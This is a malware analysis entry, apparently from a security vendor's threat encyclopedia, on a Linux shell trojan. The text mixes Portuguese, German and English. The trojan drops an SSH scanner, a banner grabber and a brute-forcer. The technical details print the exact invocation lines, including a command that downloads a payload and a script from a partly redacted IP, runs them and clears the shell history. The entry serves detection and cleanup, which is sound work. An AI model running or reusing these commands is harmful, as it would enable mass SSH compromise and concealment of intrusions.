Analisado por: Joshua Paul Ignacio   

 

N/A

 Plataforma:

Linux/Unix

 Classificao do risco total:
 Potencial de dano:
 Potencial de distribuição:
 infecção relatada:
 Exposição das informações:
Baixo
Medium
Alto
Crítico

  • Tipo de grayware:
    Trojan

  • Destrutivo:
    Não

  • Criptografado:
    Não

  • In the Wild:
    Sim

  Visão geral

Canal de infecção: Aus dem Internet heruntergeladen, Fallen gelassen von anderer Malware

Wird möglicherweise von anderer Malware/Grayware/Spyware von externen Sites heruntergeladen.

Löscht Dateien, so dass Programme und Anwendungen nicht ordnungsgemäß ausgeführt werden.

  Detalhes técnicos

Tipo de compactação: 1,226 bytes
Tipo de arquivo: Other
Residente na memória: Não
Data de recebimento das amostras iniciais: 20 maio 2020
Carga útil: Deletes files, Downloads files, Terminates processes, Connects to URLs/IPs, Executes files

Übertragungsdetails

Wird möglicherweise von der folgenden Malware/Grayware/Spyware von externen Sites heruntergeladen:

Installation

Schleust die folgenden Dateien ein:

  • /{Malware Path}/motd
  • /{Malware Path}/shitscanner → Detected as HackingTools_Shark
    • A scanner that will search for hosts in the internet with an open Port 22.
    • The results will be stored in bios.txt
    • It accepts the following parameters:
      • Port Number
      • -a or -b (class)
        • -a (A network) must be between 1 and 254
        • -b (B network) example: 192.168
      • -i (interface)
      • -s (speed)
  • /{Malware Path}/boner → Detected as HackTool.Linux.BANGRAB.A
    • Grabs the banner of the IP addresses indicated in the "infile" paramater
    • The results will be stored in banner.log
    • The contents of banner.log will then be filtered by listing IP addresses of machines with OpenSSH running on Port 22.
    • The filtered list will be stored on mfu.txt
    • It accepts the following parameters:
      • infile - a text file that contains IP addresses
      • port
      • threads - concurrent IPs being scanned
  • /{Malware Path}/brute → Detected as HackTool.Linux.SSHBRUTE.GA
    • a Haiduc scanner
    • It will use the following as arguments to connect, download and execute files to gain control over its target:
    • Successfully compromised machines will be saved in gasite.txt

Andere Systemänderungen

Löscht die folgenden Dateien:

  • /{Malware Path}/bios.txt
  • /{Malware Path}/mfu.txt
  • /{Malware Path}/banner.log

Prozessbeendigung

Beendet Prozesse oder Dienste, die einen oder mehrere dieser Zeichenfolgen enthalten, wenn sie im Speicher des betroffenen Systems ausgeführt werden:

  • shitscanner
  • boner

Andere Details

Es macht Folgendes:

  • It executes the dropped files with the following paramaters:
    • timeout $timeout ./{Malware Path}/shitscanner $port -i $interface -s $speed
      • where:
        • $timeout - 130
        • $port - 22
        • $interface - eth0
        • $speed - 10
    • ./{Malware Path}/boner bios.txt 22 3500
    • ./{Malware Path}/brute 9999 -f mfu.txt pass_file 22 "wget http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 ;chmod 777 *; ./kiga.x86 ROOTS; rm -rf kiga*;wget http://{BLOCKED}.{BLOCKED}.17.186/kit.sh ;sh kit.sh; history -c"
      • where:
        • pass_file - list of credentials stored

  Solução

Mecanismo de varredura mínima: 9.850
Primeiro arquivo padrão VSAPI: 15.882.02
Data do lançamento do primeiro padrão VSAPI: 20 maio 2020
VSAPI OPR Pattern Version: 15.883.00
VSAPI OPR Pattern veröffentlicht am: 21 maio 2020

Durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt, und löschen Sie Dateien, die als Trojan.SH.ETIN.B entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.


Participe da nossa pesquisa!